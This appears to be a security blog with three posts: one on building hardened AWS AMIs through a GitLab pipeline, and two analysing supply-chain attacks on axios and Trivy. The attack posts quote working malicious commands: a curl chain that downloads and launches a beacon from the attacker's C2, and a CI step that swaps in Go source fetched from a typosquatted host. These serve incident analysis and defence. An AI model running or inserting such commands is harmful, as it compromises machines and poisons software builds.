rosecurity@cloud

Building an AWS Image Factory with Packer and Terratest

2026-05-20T00:00:00+00:00

Sorry I’ve been quiet lately. My head has been down on my newest adventure. I’m so used to being the sole operator, platform engineer, SRE, or whatever that day brings that it’s odd to take a step back and be tasked with providing enterprise cybersecurity for cloud environments that other teams are operating. I’ve had so many cool new projects that will make for some great technical blogs, so I figured I would start with this one. The idea is simple: how do you provide your organization with hardened operating systems that teams can actually deploy into the cloud? A lot of compliance terms and frameworks get tossed around, but the vision is this: how do you provide an image factory of CIS-hardened AMIs, bake in a custom baseline of tools, and share those images across numerous AWS accounts and organizations?

Here is my approach, the downfalls, the unknowns, and the fun parts. I apologize in advance that this is very GitLab centric CI/CD, but if you like the design, feel free to port it over to your source control system of choice.

Scaffolding

The repository starts with the boring stuff first, because the boring stuff is what keeps the project usable after the first week. Besides .gitignore and .gitattributes, there is a short README.md, a Brewfile for local tooling, an .editorconfig, a SECURITY.md, and the usual .gitlab/merge_request_templates and .gitlab/issue_templates so reviews and issues don’t turn into archaeology.

A small Makefile covers common local commands, but .pre-commit-config.yaml does most of the early heavy lifting. It gives the repo one place for file hygiene, formatting checks, and basic guardrails before anything gets near CI. Here’s the first pass of hooks for the Image Factory.

# See https://pre-commit.com for more information
# See https://pre-commit.com/hooks.html for more hooks
repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v5.0.0
    hooks:
      - id: end-of-file-fixer
      - id: check-merge-conflict
      - id: trailing-whitespace
        args: [--markdown-linebreak-ext=md]
      - id: check-shebang-scripts-are-executable

      # YAML
      - id: check-yaml

      # Cross platform
      - id: check-case-conflict
      - id: mixed-line-ending
        args: [--fix=lf]

  - repo: local
    hooks:
      - id: packer-fmt
        name: Packer format check
        entry: packer fmt -check -recursive packer
        language: system
        files: ^packer/.*\.pkr\.hcl$
        pass_filenames: false

      - id: shellcheck
        name: ShellCheck
        entry: shellcheck
        language: system
        types: [shell]

That runs on every commit and removes a lot of pointless review noise. If Packer formatting or shell linting is broken, I want the hook to catch it before a reviewer has to.

Side note, I typically have a dedicated pre-commit CI job for making sure everything passes as a prerequisite to other pipelines.

The repo also has a docs directory for the usual odds and ends: architecture notes, decision records, and diagrams.

AWS Prerequisites

Before the repo can build anything useful, AWS needs a few pieces in place. If the AMIs use encrypted EBS volumes, the KMS key policy has to let the build account use the key and let consumer accounts launch from the shared AMIs. You also need the normal network plumbing: VPC, subnets, routing, security groups, and outbound access so temporary build and test instances can pull updates, download packages, reach SSM, and install whatever baseline tooling your organization requires.

An optional AMI reaper Lambda is worth adding early. Failed builds, superseded images, and half-finished experiments shouldn’t live forever. If the pipeline tags images during build, test, and publish, cleanup can be driven from those tags instead of guessing (thank you boto3).

The last prerequisite is identity. Packer, Terratest, and publishing should each have an IAM role, and CI should use OIDC to assume those roles. Long-lived AWS keys in CI variables are one of those things that feel convenient right up until they become an incident, and they make me feel like I need a shower if I have to use them.

Codebase Structure

The layout is intentionally boring. Each image gets its own Packer root under packer/images//, and each root owns the same four files: versions.pkr.hcl, variables.pkr.hcl, sources.pkr.hcl, and build.pkr.hcl. When someone adds another operating system, the plugin versions, inputs, AMI lookup logic, and hardening steps all have a known place to live.

├── account-map.yaml
├── Brewfile
├── docs
├── Makefile
├── packer
│   ├── images
│   │   └── aws
│   │       ├── al2023
│   │       │   ├── build.pkr.hcl
│   │       │   ├── sources.pkr.hcl
│   │       │   ├── variables.pkr.hcl
│   │       │   └── versions.pkr.hcl
│   │       └── ubuntu24.04
│   │           ├── build.pkr.hcl
│   │           ├── sources.pkr.hcl
│   │           ├── variables.pkr.hcl
│   │           └── versions.pkr.hcl
├── README.md
├── scripts
│   ├── build.sh
│   └── gitlab
│       └── detect-packer-changes.sh
├── SECURITY.md
└── tests
    ├── terraform
    │   ├── main.tf
    │   ├── outputs.tf
    │   ├── providers.tf
    │   ├── README.md
    │   ├── variables.tf
    │   └── versions.tf
    └── terratest
        ├── build_test.go
        ├── checks
        │   ├── al2023-cis-level1.yaml
        │   └── ubuntu24.04-cis-level1.yaml
        ├── go.mod
        └── go.sum

The other important root-level file is account-map.yaml. It lists the consumer AWS accounts that should receive launch permissions after an AMI passes testing. I prefer keeping that as data in the repo instead of hiding it in CI variables. A merge request should show exactly who is being added or removed from the distribution list.

Building the Image

The build wrapper stays small. It takes a Packer environment through PKR_ENV, initializes that image root, checks the template, and writes the final manifest into artifacts/. The local command and the CI command are the same thing, which makes build failures much easier to reproduce.

#!/usr/bin/env bash

set -euo pipefail

: "${PKR_ENV:? PKR_ENV is required}"
if ! command -v "packer" &>/dev/null; then
  echo "Error: Packer is not installed."
  exit 1
fi

echo "Initializing Packer environment in $PKR_ENV"
packer init "$PKR_ENV"

echo "Checking Packer configuration formatting..."
packer fmt -check "$PKR_ENV"

echo "Validating Packer configurations..."
packer validate "$PKR_ENV"

echo "Building Packer image..."
mkdir -p artifacts
packer build -on-error=cleanup "$PKR_ENV"

For AL2023, the Packer source starts by finding the base AMI, creating a timestamped name, and tagging the AMI and snapshots with enough metadata to make cleanup and audit work sane. Tags like ImageFactoryManaged, ImageFactoryPublished, BaseImageProduct, and SourceAmi give you a quick answer to what created the image, what it was based on, and whether it has been released.

locals {
  build_timestamp = regex_replace(timestamp(), "[- TZ:]", "")
  cis_product     = "CIS Hardened Image Level 1 on Amazon Linux 2023"

  ami_name = var.ami_name != "" ? var.ami_name : format(
    "%s-%s-%s",
    var.ami_name_prefix,
    var.cis_marketplace_version,
    local.build_timestamp,
  )

  common_tags = merge(
    {
      Name                  = local.ami_name
      BaseImageProduct      = local.cis_product
      BaseImageVersion      = var.cis_marketplace_version
      CisBenchmarkLevel     = "1"
      ImageFactoryManaged   = "true"
      ImageFactoryPublished = "false"
      SourceAmi             = data.amazon-ami.this.id
    },
    var.tags,
  )
}

data "amazon-ami" "this" {
  region      = var.aws_region
  owners      = var.source_ami_owners
  most_recent = var.source_ami_most_recent

  filters = merge(
    {
      architecture        = var.source_ami_architecture
      name                = var.source_ami_name_filter
      root-device-type    = "ebs"
      virtualization-type = "hvm"
    },
    var.source_ami_product_code != "" ? { product-code = var.source_ami_product_code } : {},
  )
}

The amazon-ebs source uses SSM Session Manager as the communicator. It sounds like a small choice, but it changes the operating model quite a bit. I don’t need to punch SSH ingress into a build subnet, pass key pairs around, or explain why a temporary builder was reachable from the internet. The instance gets temporary SSM permissions, Packer connects through Session Manager, and the build network can stay private.

source "amazon-ebs" "al2023" {
  ami_description             = var.ami_description
  ami_name                    = local.ami_name
  ami_regions                 = var.ami_regions
  associate_public_ip_address = var.associate_public_ip_address
  encrypt_boot                = var.encrypt_boot
  instance_type               = var.instance_type
  kms_key_id                  = var.kms_key_id
  region                      = var.aws_region
  source_ami                  = data.amazon-ami.this.id

  communicator     = "ssh"
  pause_before_ssm = "30s"
  ssh_interface    = "session_manager"
  ssh_timeout      = var.ssh_timeout
  ssh_username     = var.ssh_username

  launch_block_device_mappings {
    delete_on_termination = true
    device_name           = "/dev/xvda"
    encrypted             = var.encrypt_boot
    kms_key_id            = var.kms_key_id
    volume_size           = var.root_volume_size
    volume_type           = var.root_volume_type
  }

  run_tags      = merge(local.common_tags, { ImageFactoryStage = "build" })
  snapshot_tags = local.common_tags
  tags          = local.common_tags
}

The hardening layer uses shell in this version because the first pass needed to stay readable and close to the AMI lifecycle. This is just an example baseline. In practice, you could start from an AWS Marketplace image that already comes hardened and layer your custom tooling on top. You could also move the hardening logic into Ansible if that fits your team better. The shape is the same either way: install the baseline agent, apply the deltas, enable the services, clean the machine, and seal it.

build {
  sources = ["source.amazon-ebs.al2023"]

  provisioner "shell" {
    inline_shebang = "/bin/bash -e"

    environment_vars = [
      "UPDATE_PACKAGES=${var.update_packages}",
    ]

    inline = [
      "set -euo pipefail",
      "if [ \"$UPDATE_PACKAGES\" = \"true\" ]; then sudo dnf update -y; fi",
      "if ! rpm -q amazon-ssm-agent >/dev/null 2>&1; then sudo dnf install -y amazon-ssm-agent; fi",
      "if ! rpm -q rsyslog >/dev/null 2>&1; then sudo dnf install -y rsyslog; fi",
      "printf '%s\\n' 'install cramfs /bin/false' 'blacklist cramfs' | sudo tee /etc/modprobe.d/cramfs.conf >/dev/null",
      "printf '%s\\n' 'net.ipv4.conf.all.accept_redirects = 0' 'net.ipv4.conf.default.accept_redirects = 0' | sudo tee /etc/sysctl.d/99-imagefactory-hardening.conf >/dev/null",
      "sudo sysctl -p /etc/sysctl.d/99-imagefactory-hardening.conf",
      "sudo mkdir -p /etc/ssh/sshd_config.d",
      "printf '%s\\n' 'PermitRootLogin no' 'PermitEmptyPasswords no' | sudo tee /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf >/dev/null",
      "sudo chmod 600 /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf",
      "printf '%s\\n' 'umask 027' | sudo tee /etc/profile.d/99-imagefactory-umask.sh >/dev/null",
      "sudo chmod 644 /etc/profile.d/99-imagefactory-umask.sh",
      "sudo systemctl enable --now amazon-ssm-agent",
      "sudo systemctl enable --now rsyslog",
      "sudo dnf clean all",
      "sudo cloud-init clean --logs",
      "sudo rm -f /etc/ssh/ssh_host_*",
    ]
  }

  post-processor "manifest" {
    output     = "artifacts/${var.ami_name_prefix}-manifest.json"
    strip_path = true
  }
}

The Ubuntu image follows the same pattern with apt, snap, a different username, and a different root device. AL2023 and Ubuntu aren’t identical, but the repo shape is close enough that a reviewer can find the operating-system-specific differences quickly.

Build Pipelines

The parent pipeline has three stages: detect, dispatch, and secret detection. The detect job figures out which image roots changed, writes a small matrix artifact, and generates a child pipeline. The dispatch job starts that generated child pipeline. This keeps the parent pipeline fast without using a giant static matrix that rebuilds every image because one line changed in one Packer directory.

stages:
  - detect
  - dispatch
  - secret-detection

variables:
  SECRET_DETECTION_ENABLED: "true"
  PACKER_VERSION: "1.15.1"
  PACKER_BUILD_IMAGE: "amazonlinux:2023"
  AWS_REGION: "us-east-2"

include:
  - local: .gitlab/ci/detect/*.gitlab-ci.yml
  - local: .gitlab/ci/dispatch/*.gitlab-ci.yml
  - template: Security/Secret-Detection.gitlab-ci.yml

The change detector compares the base and head SHAs, walks changed files under packer/images/**, finds the nearest directory containing versions.pkr.hcl, and emits a child pipeline job for each changed image. The generated job forwards variables like PKR_ENV, PKR_IMAGE, and PKR_CHECKS_FILE, so one provider pipeline can handle many image directories without copy and paste.

find_packer_root() {
  path="$1"
  dir="${path%/*}"

  while [ "$dir" != "." ] && [ "$dir" != "packer/images" ]; do
    if [ -f "$dir/versions.pkr.hcl" ]; then
      printf '%s\n' "$dir"
      return 0
    fi
    dir="${dir%/*}"
  done

  return 1
}

checks_file() {
  case "$1" in
    al2023)
      printf 'checks/al2023-cis-level1.yaml'
      ;;
    ubuntu24.04)
      printf 'checks/ubuntu24.04-cis-level1.yaml'
      ;;
    *)
      printf 'checks/al2023-cis-level1.yaml'
      ;;
  esac
}

The AWS child pipeline is where the real lifecycle happens. It builds the AMI, extracts the Packer manifest, launches a test instance, runs hardening checks over SSM, and publishes only after those checks pass.

stages:
  - build
  - test
  - publish

packer:build:
  extends: .packer
  stage: build
  script:
    - ./scripts/build.sh
    - |
      manifest="$(find artifacts -type f -name '*-manifest.json' | sort | tail -n 1)"
      artifact_ids="$(jq -r '[.builds[] | select(.artifact_id != null and .artifact_id != "") | .artifact_id] | last // ""' "$manifest")"
      primary_artifact="${artifact_ids%%,*}"
      ami_region="${primary_artifact%%:*}"
      ami_id="${primary_artifact#*:}"
      ami_name="$(aws ec2 describe-images --region "$ami_region" --image-ids "$ami_id" --query 'Images[0].Name' --output text)"

      {
        printf 'AMI_ARTIFACT_IDS=%s\n' "$artifact_ids"
        printf 'AMI_REGION=%s\n' "$ami_region"
        printf 'AMI_ID=%s\n' "$ami_id"
        printf 'AMI_NAME=%s\n' "$ami_name"
      } > artifacts/packer.env
  artifacts:
    reports:
      dotenv: artifacts/packer.env
    paths:
      - artifacts/

terratest:ami:
  extends: .terratest
  stage: test
  needs:
    - job: packer:build
      artifacts: true
  script:
    - cd tests/terratest
    - go test -v -timeout 45m . -args -ami_name "$AMI_NAME" -checks_file "${PKR_CHECKS_FILE:-checks/al2023-cis-level1.yaml}"

The artifacts/packer.env file is the handoff between build and test. GitLab loads it as a dotenv report, so the test stage doesn’t have to parse the Packer manifest again. It gets the AMI name from the previous job and uses that as the input for the Terratest fixture.

The other part I care about is authentication. The build and test jobs use GitLab OIDC to assume an AWS role. No long-lived AWS access keys in CI, no local credentials pasted into variables, and no mystery user showing up in CloudTrail. The job writes the GitLab OIDC token to a file, exports AWS_ROLE_ARN, and lets the AWS SDK credential chain handle the rest.

.packer:
  image:
    name: "$PACKER_BUILD_IMAGE"
    entrypoint: [""]
  id_tokens:
    AWS_OIDC_TOKEN:
      aud: "https://gitlab.com"
  variables:
    AWS_WEB_IDENTITY_TOKEN_FILE: "$CI_PROJECT_DIR/.aws/gitlab-oidc-token"
  before_script:
    - |
      : "${AWS_OIDC_TOKEN:?Missing GitLab AWS OIDC token.}"
      : "${AWS_PACKER_BUILD_OIDC_ROLE_ARN:?Missing AWS Packer build OIDC role ARN.}"

      mkdir -p "$CI_PROJECT_DIR/.aws"
      printf '%s' "$AWS_OIDC_TOKEN" > "$AWS_WEB_IDENTITY_TOKEN_FILE"
      export AWS_ROLE_ARN="$AWS_PACKER_BUILD_OIDC_ROLE_ARN"
      export AWS_ROLE_SESSION_NAME="gitlab-$CI_PROJECT_ID-$CI_PIPELINE_ID-$CI_JOB_ID"

Testing and Scanning AMIs

Building an AMI is not enough. The pipeline needs to boot the image and prove that the expected hardening controls are present on a running instance.

The test fixture launches one EC2 instance from the AMI name produced by Packer. It discovers the build VPC and subnets by tag, attaches a temporary SSM-capable instance profile when one is not provided, and avoids SSH entirely.

data "aws_ami" "test" {
  count = var.tests_enabled ? 1 : 0

  most_recent = true
  owners      = var.ami_owners

  filter {
    name   = "name"
    values = [var.ami_name]
  }

  filter {
    name   = "root-device-type"
    values = ["ebs"]
  }

  filter {
    name   = "virtualization-type"
    values = ["hvm"]
  }
}

resource "aws_instance" "test" {
  count = var.tests_enabled ? 1 : 0

  ami                         = one(data.aws_ami.test[*].id)
  instance_type               = var.instance_type
  subnet_id                   = sort(one(data.aws_subnets.test[*].ids))[0]
  vpc_security_group_ids      = var.security_group_ids != null ? var.security_group_ids : [one(aws_security_group.test[*].id)]
  iam_instance_profile        = var.iam_instance_profile != null ? var.iam_instance_profile : one(aws_iam_instance_profile.test[*].name)
  associate_public_ip_address = var.associate_public_ip_address

  tags = merge(
    var.tags,
    {
      Name = format("%s-test", var.ami_name)
    },
  )
}

The Go test loads a YAML file of hardening checks, waits for SSM to report that the instance is connected, and then runs each command through AWS-RunShellScript. A check passes when the command exits successfully and, when needed, stdout contains the expected value.

type hardeningCheck struct {
	ID                   string `yaml:"id"`
	Description          string `yaml:"description"`
	Command              string `yaml:"command"`
	ExpectStdoutContains string `yaml:"expect_stdout_contains,omitempty"`
}

func TestAMIHardeningChecks(t *testing.T) {
	t.Parallel()
	logger.Default = logger.Discard

	if *amiName == "" {
		t.Skip("ami_name flag must be set")
	}

	const tfDir = "../terraform"

	defer ts.RunTestStage(t, "destroy", func() {
		destroyTerraform(t, tfDir)
	})

	ts.RunTestStage(t, "deploy", func() {
		applyTerraform(t, tfDir)
	})

	ssmClient := aws.NewSsmClient(t, awsRegion)

	ts.RunTestStage(t, "validate", func() {
		validate(t, tfDir, ssmClient)
	})
}

The checks use plain YAML so security engineers can review them without having to read Go. Adding another assertion means updating the relevant checks file and letting the same test harness run it.

checks:
  - id: 1.1.1.1-cramfs-disabled
    description: cramfs filesystem module is disabled
    command: "! lsmod | grep -q cramfs && modprobe -n -v cramfs 2>&1 | grep -qE 'install /bin/(true|false)'"

  - id: 1.5.1-aslr-enabled
    description: kernel.randomize_va_space is set to 2 (full ASLR)
    command: "sysctl -n kernel.randomize_va_space"
    expect_stdout_contains: "2"

  - id: 5.2.6-ssh-root-login-disabled
    description: SSH PermitRootLogin is set to no
    command: "sshd -T 2>/dev/null | grep -i '^permitrootlogin' | awk '{print $2}'"
    expect_stdout_contains: "no"

The custom check format isn’t mandatory. If a team doesn’t want to maintain a separate validation harness, the same checks can move into Ansible validation playbooks. Ansible can use SSM to run checks on the temporary instance without opening SSH, which keeps the network model mostly the same while moving the assertions into a tool more operators already know. That is probably where this project goes over time.

This isn’t a full substitute for every scanner or every benchmark. The wider program should still include vulnerability scanning, package inventory, and AWS Inspector coverage. These tests catch direct build regressions immediately: the service didn’t start, the kernel setting didn’t stick, the SSH drop-in didn’t get read, or the baseline package never landed.

Publishing is gated to the default branch. Merge requests can build and test, but they don’t share AMIs to the organization. Once a default-branch build passes, the publish job tags the image as published and grants launch permissions to each account in account-map.yaml.

publish:ami:
  extends: .terratest
  stage: publish
  needs:
    - job: packer:build
      artifacts: true
    - job: terratest:ami
  script:
    - |
      published_at="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
      account_ids="$(sed -n "s/.*: '\([0-9]\{12\}\)'$/\1/p" account-map.yaml)"

      if [ -z "$account_ids" ]; then
        printf 'No AWS account IDs found in account-map.yaml.\n' >&2
        exit 1
      fi

      for artifact in $(printf '%s' "$AMI_ARTIFACT_IDS" | tr ',' ' '); do
        ami_region="${artifact%%:*}"
        ami_id="${artifact#*:}"

        aws ec2 create-tags \
          --region "$ami_region" \
          --resources "$ami_id" \
          --tags \
            Key=ImageFactoryPublished,Value=true \
            Key=ImageFactoryPublishedAt,Value="$published_at"

        for account_id in $account_ids; do
          aws ec2 modify-image-attribute \
            --region "$ami_region" \
            --image-id "$ami_id" \
            --launch-permission "Add=[{UserId=$account_id}]"
        done
      done
  rules:
    - if: '$CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH'

The operational details matter here. The job reads artifact IDs from the Packer manifest instead of assuming one region. It tags the AMI after tests pass, not before. It fails closed if the account map is empty. Those small choices make the release process repeatable without someone babysitting every run.

Tradeoffs and Unknowns

The main tradeoff is time. Building an AMI, booting it, waiting for SSM, running checks, and cleaning everything up is slower than normal application CI. The change-detection pipeline keeps the cost down by rebuilding only affected images. The boot test is still worth it when the alternative is distributing a broken base image to dozens of accounts.

Benchmark drift needs active ownership. CIS guidance, Marketplace images, distro defaults, and security agents all change. The validation checks should live beside the image definition so every hardening change can be reviewed with the matching test change.

Marketplace image handling has its own operational messiness. Product codes, owner IDs, naming patterns, and regional availability are all things you have to test in a real AWS account. Parameterizing the inputs helps, but it doesn’t remove the fact that AWS Marketplace images aren’t always as smooth as a vanilla owner-and-name AMI lookup.

Finally, AMI sharing is only part of distribution. Consumers still need a sane way to discover the latest approved AMI, whether that is through tags, SSM parameters, Service Catalog, Terraform data sources, or an internal platform workflow. Sharing the image makes it available. It doesn’t automatically make every team use it correctly.

Wrapping Up

An image factory isn’t a compliance shortcut. It is a controlled path for choosing a trusted base, applying organization-specific deltas, testing the running result, and sharing the AMI only after the pipeline proves it is ready.

That’s the real goal: turn “please use the hardened image” from a slide deck request into something teams can actually use.

If you liked (or hated) this blog, feel free to check out my GitHub!

Welcome to Transitive Dependency Hell

2026-03-31T00:00:00+00:00

At 00:21 UTC on March 31, someone published axios@1.14.1 to npm. Three hours later it was pulled. In between, every npm install and npx invocation that resolved axios@latest executed a backdoor on the installing machine. Axios has roughly 80 million weekly downloads, and here’s what that three-hour window looked like from one developer’s MacBook.

Monday Night

A developer sits down, opens a terminal, and runs a command they’ve run dozens of times before:

npx --yes @datadog/datadog-ci --help

A legitimate tool from a legitimate vendor. The --yes flag skips npm’s confirmation prompt. The developer (or Claude) isn’t even using the tool yet, just checking its options.

npm resolves the dependency tree and starts writing packages to disk: dogapi, escodegen, esprima, js-yaml, fast-xml-parser, rc, is-docker, semver, uuid, and axios. All names you’d recognize, and all packages that individually look fine. But axios just resolved to 1.14.1, which is not the version that Axios’s maintainers published four days earlier. It’s the version an attacker published twenty minutes ago.

The Hijack

axios@1.14.0 was the last legitimate release, published on March 27 through GitHub Actions OIDC provenance. The attacker compromised the npm account of jasonsaayman, an existing Axios maintainer, and changed the account email from jasonsaayman@gmail.com to ifstap@proton.me. With publish access, they pushed two malicious versions in quick succession:

00:21:58 UTC: axios@1.14.1, tagged latest
01:00:57 UTC: axios@0.30.4, tagged legacy

The latest tag meant every unversioned axios install worldwide pulled the backdoor. The legacy tag caught anyone pinned to the 0.x line. Both versions added a single new dependency: plain-crypto-js.

The Postinstall Chain

plain-crypto-js declared postinstall: node setup.js in its package.json, and npm ran it automatically. The script used two layers of obfuscation (string reversal with base64 decoding, then an XOR cipher keyed with OrDeR_7077) to hide its real behavior from anyone grepping for suspicious strings. Once decoded, it branched by platform.

On the developer’s Mac, CrowdStrike’s process tree captured the full chain. npx spawned node setup.js, which shelled out to /bin/sh to launch osascript against a script dropped into the per-user temp directory:

nohup osascript /var/folders/gz/s87fs56d0pqbr1s7l1b898h80000gn/T/6202033

osascript is Apple’s AppleScript interpreter, a legitimate Apple-signed binary present on every Mac. Running code through it instead of directly lets the attacker hide behind a trusted process name. The nohup ensures the process survives if the parent terminal closes, and the AppleScript then executed the real payload:

sh -c 'curl -o /Library/Caches/com.apple.act.mond \
            -d packages.npm.org/product0 \
            -s http://sfrclak.com:8000/6202033 \
       && chmod 770 /Library/Caches/com.apple.act.mond \
       && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"' \
  &> /dev/null

Download, set executable, and launch the beacon, all in a single sh -c invocation. If any step fails, the chain stops. If it succeeds, the malware is already running before the AppleScript exits.

The output path masquerades as an Apple system daemon using the com.apple.* reverse-DNS convention. The -d packages.npm.org/product0 is not a real npm URL but a tracking identifier sent as POST data so the C2 knows which package triggered the install. The -s flag keeps curl silent, and the outer &> /dev/null swallows any output from the entire chain.

The binary immediately began beaconing to 142.11.206.73:8000 (sfrclak.com) over HTTP. Ten hours later, CrowdStrike’s telemetry shows com.apple.act.mond still running and reading /Library/Preferences/com.apple.networkd.plist for network interface configurations, proxy settings, and VPN connection details. The kind of reconnaissance you do when you’re deciding whether a machine is worth keeping access to.

Meanwhile, back in node_modules, setup.js was cleaning up after itself. It deleted its own file with fs.unlink(__filename) and renamed a clean package.md to package.json, overwriting the version that declared the postinstall hook. Anyone investigating the installed package later would find no trace of the trigger.

Not Just Macs

The same setup.js had branches for every major platform:

Platform	Payload Path	Technique
macOS	`/Library/Caches/com.apple.act.mond`	AppleScript, curl, binary masquerading as Apple daemon
Windows	`%PROGRAMDATA%\wt.exe`	PowerShell copied and renamed to look like Windows Terminal; VBScript loader drops `.ps1` payload with `-w hidden -ep bypass`
Linux	`/tmp/ld.py`	Python script downloaded and backgrounded with `nohup python3`

All three phoned home to the same C2: sfrclak.com:8000/6202033.

What CrowdStrike Caught (and Didn’t)

Falcon flagged the macOS beacon as MacOSApplicationLayerProtocol, mapping to T1071 (Application Layer Protocol) under TA0011 (Command and Control). The detection triggered on the last step in the chain: a binary at a suspicious path making outbound HTTP requests on a non-standard port.

Everything before that ran unimpeded. The node setup.js postinstall hook, the osascript execution from a temp directory, the curl download and chmod all completed before any security tooling intervened. If the attacker had used HTTPS on port 443 to a less suspicious-looking domain, the beacon might not have triggered either.

IOCs

Indicator	Type	Value
C2 Domain	Domain	`sfrclak.com`
C2 IP	IPv4	`142.11.206.73`
C2 Port	Port	`8000`
Campaign ID	String	`6202033`
macOS Payload	File	`/Library/Caches/com.apple.act.mond`
macOS Hash	SHA256	`92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a`
Windows Payload	File	`%PROGRAMDATA%\wt.exe`
Linux Payload	File	`/tmp/ld.py`
Tracking ID	String	`packages.npm.org/product0`
Compromised Packages	npm	`axios@1.14.1`, `axios@0.30.4`, `plain-crypto-js@4.2.0-4.2.1`
Hijacked Account	npm	`jasonsaayman` (email changed to `ifstap@proton.me`)
XOR Key	String	`OrDeR_7077`

Takeaways

Check your lockfiles now. Search package-lock.json, yarn.lock, and pnpm-lock.yaml for axios@1.14.1, axios@0.30.4, or any reference to plain-crypto-js. If you find them, assume the installing machine is compromised.

Disable postinstall scripts. Add ignore-scripts=true to ~/.npmrc. When a package legitimately needs a postinstall hook for native compilation, run npm rebuild explicitly after reviewing the script. This single setting would have stopped the entire attack chain.

Monitor for osascript spawned by node. There is no legitimate reason for a Node.js process to execute AppleScript from a temp directory. If your endpoint detection sees that process ancestry, kill it.

The developer did nothing wrong. They ran a standard tool from a major vendor and trusted npm to deliver safe code. The problem is that npm’s default behavior (resolve the full tree, install everything, run every postinstall script, no questions asked) turns every npm install into an implicit trust decision across hundreds of packages maintained by people you’ve never met. The Axios maintainer account was compromised for three hours. That was enough.

This is the third post in a series on software supply chain attacks. The previous posts covered the Trivy ecosystem compromise and the limits of SHA pinning. Joe Desimone’s technical analysis of the axios compromise is worth reading in full.

If you liked (or hated) this blog, feel free to check out my GitHub!

SHA Pinning Is Not Enough

2026-03-24T00:00:00+00:00

A few days ago I wrote about how the Trivy ecosystem got turned into a credential stealer. One of my takeaways was “pin by SHA.” Every supply chain security guide says it, I’ve said it, every subreddit says it, and the GitHub Actions hardening docs say it.

The Trivy attack proved it wrong, and I think we need to talk about why.

Quick Refresher

For anyone not familiar, SHA pinning looks like this:

# Tag reference (mutable, dangerous)
- uses: actions/checkout@v6.0.2

# SHA-pinned (immutable, safe... right?)
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2

Git tags are just pointers, so anyone with write access can move a tag to a different commit. SHAs are cryptographic hashes of the commit content. You can’t forge one and you can’t move one. Pin to a SHA and you get exactly the code you reviewed, forever.

That logic is correct, but it’s not the whole picture.

What Actually Happened

On March 4, commit 1885610c landed in aquasecurity/trivy. The message said fix(ci): Use correct checkout pinning, attributed to DmitriyLewen (a legitimate maintainer). The diff touched two workflow files across 14 lines. Most of it was noise: single quotes swapped for double quotes, a trailing space removed from a mkdir line. The kind of commit that gets waved through review because there’s nothing to review.

Two lines mattered. The first swapped the actions/checkout SHA in the release workflow:

-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2

The # v6.0.2 comment stayed. The SHA changed. The second change added --skip=validate to the GoReleaser invocation, disabling integrity checks on the build artifacts.

The payload lived at the other end of that SHA. Commit 70379aad sits in the actions/checkout repository as an orphaned commit. Someone had forked actions/checkout, created a commit with malicious code, and walked away. GitHub’s UI actually flags it with a yellow banner: “This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.” The author is listed as Guillermo Rauch (spoofed), the commit message references PR #2356 (a real, closed PR by a GitHub employee), and the commit is unsigned. Every bit of metadata is designed to look routine at a glance.

Here’s the part that should bother you: GitHub’s architecture makes fork commits reachable by SHA from the parent repo. When GitHub Actions resolved actions/checkout@70379aad..., it fetched the commit, found valid code, and ran it. No warning in the run log. No signal that this commit came from outside the repository’s branch history. As far as the runtime was concerned, it was a totally normal commit in actions/checkout.

Anyone can do this right now. Fork a popular action, create a commit with whatever code you want, and produce a SHA that GitHub will resolve as if it belongs to the original repository. SHA pinning guarantees you get the same commit every time. It does not guarantee that commit was ever part of the upstream project.

Nobody Reads Hex Strings

The malicious checkout replaced action.yml’s Node.js entrypoint with a composite action that did a legitimate checkout first, then silently pulled down replacements for the Trivy source:

- name: "Setup Checkout"
  shell: bash
  run: |
    BASE="https://scan.aquasecurtiy.org/static"
    curl -sf "$BASE/main.go" -o cmd/trivy/main.go &> /dev/null
    curl -sf "$BASE/scand.go" -o cmd/trivy/scand.go &> /dev/null
    curl -sf "$BASE/fork_unix.go" -o cmd/trivy/fork_unix.go &> /dev/null
    curl -sf "$BASE/fork_windows.go" -o cmd/trivy/fork_windows.go &> /dev/null
    curl -sf "$BASE/.golangci.yaml" -o .golangci.yaml &> /dev/null

Four Go files from a typosquatted C2, dropped into cmd/trivy/, replacing the real source. A fifth download replaced .golangci.yaml to disable linter rules that would have flagged the injected code. GoReleaser ran with validation skipped, built binaries from the poisoned source, and published them as v0.69.4 through Trivy’s own release infrastructure. The malware was compiled in. No runtime download, no shell script, no base64.

But none of that is visible from the Trivy repository side. What a reviewer actually sees is this:

-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@70379aad1a8b40919ce8b382d3cd7d0315cde1d0 # v6.0.2

Two 40-character hex strings, both ending with # v6.0.2. Be honest: you didn’t compare them character by character just now. Neither did anyone reviewing that commit. The version comment is the thing people actually read, and the version comment is just a freeform string that anybody can type.

SHA pinning optimizes for machine verification but falls apart at the moment a human has to review a change. The attacker knew this, which is why the rest of the 14-line diff was cosmetic noise. Hide the important thing behind boring things, and the reviewer’s attention goes to the boring things.

The Comment That Lied

There’s a convention that’s emerged with SHA pinning where you put the version tag in a comment next to the SHA so humans can tell what version they’re using:

- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2

That comment is free text. Nothing validates it. No tool in the GitHub Actions pipeline checks that the SHA actually corresponds to v6.0.2. Dependabot and Renovate verify tag-to-SHA mappings when they make updates, but they can’t protect against someone hand-editing a SHA and typing whatever they want in the comment. In this case, the commit came from a maintainer account (or at least one with write access), so it sailed right past branch protection.

The comment # v6.0.2 was the entire social engineering payload on the Trivy repository side. Not a phishing email, not a fake login page. Five characters in a YAML comment that made a reviewer’s brain skip right past the hex string next to it.

What Actually Helps

SHA pinning is still better than tag references. It knocks out one class of attack (tag mutation) entirely. But treating it as “good enough” is where things fall apart.

